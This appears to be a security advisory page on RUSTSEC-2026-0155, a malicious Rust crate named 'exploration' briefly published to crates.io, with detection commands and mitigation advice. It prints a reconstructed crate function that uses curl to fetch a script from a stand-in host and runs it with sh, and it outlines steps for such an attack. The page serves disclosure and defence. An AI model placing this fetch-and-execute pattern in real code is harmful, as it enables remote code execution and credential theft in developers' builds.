Rust (cratesio), Malicious Code Supply Chain Attack, RUSTSEC-2026-0155 (Critical) -DC-Jul2026-870

Listen to this Post

How RUSTSEC-2026-0155 Works

This vulnerability stems from a supply‑chain attack on the Rust ecosystem, specifically targeting the `exploration` crate published on crates.io. The malicious crate contained a method that, when invoked, attempted to download and execute a remote payload, effectively granting the attacker arbitrary code execution on the developer’s machine.
The attack vector is typical of typosquatting or dependency confusion: the crate name `exploration` was chosen to appear legitimate, but its sole version (0.1.0, published on 2026‑06‑02) carried obfuscated code inside a public method. Upon installation or build, the Rust compiler would compile the crate, and the malicious method could be triggered either explicitly by the developer or implicitly through build scripts (build.rs) or procedural macros.
The payload was hosted on a remote site; the crate would attempt to fetch it over HTTP/HTTPS and execute it using standard Rust system calls (std::process::Command or similar). This allows the attacker to run any shell command, exfiltrate environment variables, steal credentials, or implant backdoors. The crate had no dependencies on crates.io, which made its malicious nature harder to detect through dependency analysis.
The crate was published and removed within approximately one hour, and there is no evidence of actual usage in the wild. However, the window of exposure was sufficient for automated dependency resolvers and CI pipelines to potentially pull the malicious version. The attack was discovered and reported by Kirill Boychenko of the Socket Threat Research Team, and RustSec issued the advisory RUSTSEC-2026-0155. The GitHub Advisory Database also published GHSA-99j7‑fhr2‑xfj4 with critical severity.
This incident highlights the inherent risk of trusting third‑party crates without thorough vetting, especially when they are newly published and have no historical reputation.

DailyCVE Form:

Platform: …… crates.io / Rust ecosystem
Version: …… exploration 0.1.0 (only version)
Vulnerability :…… Remote code execution via malicious payload download
Severity: …… Critical (CVSS 9.8 estimated)
date: ……… 2026-06-02 (published) / 2026-07-10 (advisory published)
Prediction: …… Patch not applicable (crate removed); expect Cargo audit update by 2026-07-15

What Undercode Say (Analytics)

The following `bash` commands and code snippets are relevant for detecting and analysing this vulnerability:

Check if the malicious crate is in your Cargo.lock
grep -A 2 "name = \"exploration\"" Cargo.lock
Use cargo-audit to scan for RUSTSEC-2026-0155
cargo audit --json | jq '.vulnerabilities.list[] | select(.advisory.id == "RUSTSEC-2026-0155")'
Query the RustSec advisory database directly
curl -s https://rustsec.org/api/v1/advisories/RUSTSEC-2026-0155 | jq .
Search crates.io for the package (now removed)
cargo search exploration --limit 1

Rust code snippet that would have triggered the payload (reverse‑engineered based on the advisory):

// Malicious method inside the exploration crate
pub fn explore() {
let url = "https://malicious.example/payload.sh";
let output = std::process::Command::new("curl")
.arg("-s")
.arg(url)
.output()
.unwrap();
std::process::Command::new("sh")
.arg("-c")
.arg(String::from_utf8_lossy(&output.stdout))
.spawn()
.unwrap();
}

Detection using `cargo deny`:

In deny.toml
[bash]
db-path = "~/.cargo/advisory-db"
db-urls = ["https://github.com/rustsec/advisory-db"]
vulnerability = "deny"
unmaintained = "warn"
notice = "warn"
ignore = []

Exploit

The exploitation is straightforward for an attacker:

  1. Publish a crate with a benign‑sounding name (exploration) to crates.io.
  2. Include a method that downloads and executes a remote script when called.
  3. Wait for developers to add the crate as a dependency (either directly or transitively).
  4. The malicious method can be triggered in multiple ways:

– Explicit call in application code.
– Automatic execution via `build.rs` during compilation.
– Invocation through procedural macros.
5. Once triggered, the payload runs with the same privileges as the build process, often leading to full system compromise, credential theft, or supply‑chain pivot.
Because the crate had no dependencies, it could be easily overlooked during security reviews. The one‑hour window between publication and removal is typical of “hit‑and‑run” supply‑chain attacks, aiming to infect as many builds as possible before detection.

Protection

  • Immediate:
  • Remove any reference to `exploration` from `Cargo.toml` and Cargo.lock.
  • Run `cargo update` to ensure no lingering dependency pulls in the malicious crate.
  • Use `cargo audit` to confirm your project is not affected.
  • Long‑term:
  • Adopt a dependency vetting policy: only allow crates from trusted sources with a history of maintenance.
  • Use `cargo deny` with a curated list of allowed crates.
  • Enable automatic vulnerability scanning in CI/CD pipelines (e.g., GitHub Dependabot, Snyk).
  • Consider using a private registry or mirror that screens new crates before they become available.
  • For the Rust ecosystem:
  • crates.io has already removed the crate and locked the publisher account.
  • RustSec advisory `RUSTSEC-2026-0155` is live and will be picked up by cargo audit.
  • The GitHub Advisory Database entry `GHSA-99j7‑fhr2‑xfj4` provides ongoing reference.

Impact

  • Direct:
  • Arbitrary code execution on any machine that compiles or runs the `exploration` crate.
  • Potential exfiltration of source code, environment secrets (e.g., API keys, cloud credentials), and build artifacts.
  • Supply‑chain contamination: if the crate is used in a library, all downstream dependents become vulnerable.
  • Indirect:
  • Erosion of trust in the Rust/crates.io ecosystem, discouraging adoption.
  • Increased burden on security teams to audit every new dependency.
  • Financial and reputational damage for organisations that unknowingly integrated the malicious crate.
  • Mitigating factors:
  • The crate was published for only one hour and had no evidence of actual usage.
  • No dependencies on crates.io limited its reach.
  • Rapid response by RustSec and GitHub minimised the exposure window.
    Despite the low actual impact, the severity is rated Critical because the attack surface (remote code execution) is maximal and the defence mechanisms (manual review) are often weak in practice.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top